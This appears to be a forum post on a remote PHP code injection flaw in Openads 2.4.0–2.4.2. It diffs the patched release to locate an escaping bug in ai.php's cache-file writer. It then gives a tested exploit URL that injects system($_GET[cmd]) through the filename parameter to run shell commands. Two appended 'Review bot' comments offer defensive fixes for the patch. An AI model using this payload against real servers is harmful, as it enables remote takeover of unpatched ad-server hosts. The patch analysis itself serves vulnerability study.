There is a vulnerability:
Openads 2.4.0 <= x <= 2.4.2
Vulnerability: Remote PHP code injection and execution
I couldn't find an exploit, nor, for that matter, a description of the vulnerability. I downloaded Openads 2.4.2 and Openads 2.4.3.
PHP:
diff -r openads-2.4.2/www/delivery/ai.php openads-2.4.3/www/delivery/ai.php 28c28 < $Id: ai.php 12787 2007-11-26 10:00:33Z andrzej.swedrzynski@openads.org $ --- > $Id: ai.php 14232 2008-01-09 17:30:42Z andrzej.swedrzynski@openads.org $ 1094,1097c1094,1100 < } elseif (preg_match('/^.+:.+$/', $what)) { < list($whatName, $whatValue) = explode(':', $what); < if ($whatName == 'zone') { < $whatName = 'zoneid'; --- > } elseif (preg_match('/^(.+):(.+)$/', $what, $matches)) { > switch ($matches[1]) { > case 'zoneid': > case 'zone': $zoneid = $matches[2]; break; > case 'bannerid': $bannerid = $matches[2]; break; > case 'campaignid': $campaignid = $matches[2]; break; > case 'clientid': $clientid = $matches[2]; break; 1099,1100d1101 < global $$whatName; < $$whatName = $whatValue; 1329c1330 < $cache_literal .= "$"."cache_name = '".addcslashes($name, "'")."';\n"; <- the vulnerability is here --- > $cache_literal .= "$"."cache_name = '".addcslashes($name, "\\'")."';\n";
After studying the functions of this script, I wrote an exploit:
http://localhost/www/delivery/ai.php?filename=antichat.jpg';system($_GET[cmd]);/*&contenttype=antichat&cmd=ls -la
Tested on Openads 2.4.2.
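Review bot: in the 1094 hunk each `case` assigns `$matches[2]` to `$zoneid`, `$bannerid`, `$campaignid` or `$clientid` with no validation, so whatever follows the colon in `$what` reaches those variables unchanged. If these are meant to be numeric ids, cast at the assignment, for example `$zoneid = (int)$matches[2];`. The first `(.+)` is also greedy, so when `$what` contains more than one colon the name group runs up to the last colon, which differs from the old `explode(':', $what)`; `^([^:]+):(.+)$` would make the split point explicit. The visible cases show no `default:` branch, so it is worth confirming that an unrecognised name is handled deliberately.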
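Review bot: in the 1329 hunk the `$cache_name` literal is still assembled by hand, and its safety now depends on the `addcslashes` character list `"\\'"` (backslash and single quote) being complete for a single-quoted PHP string. Generating the literal with `var_export($name, true)` would remove that dependency and drop the manual `'...'` wrapping. A short comment on this line stating that the output is written into a cache file that is later executed as PHP would also help the next reader see why the escaping matters.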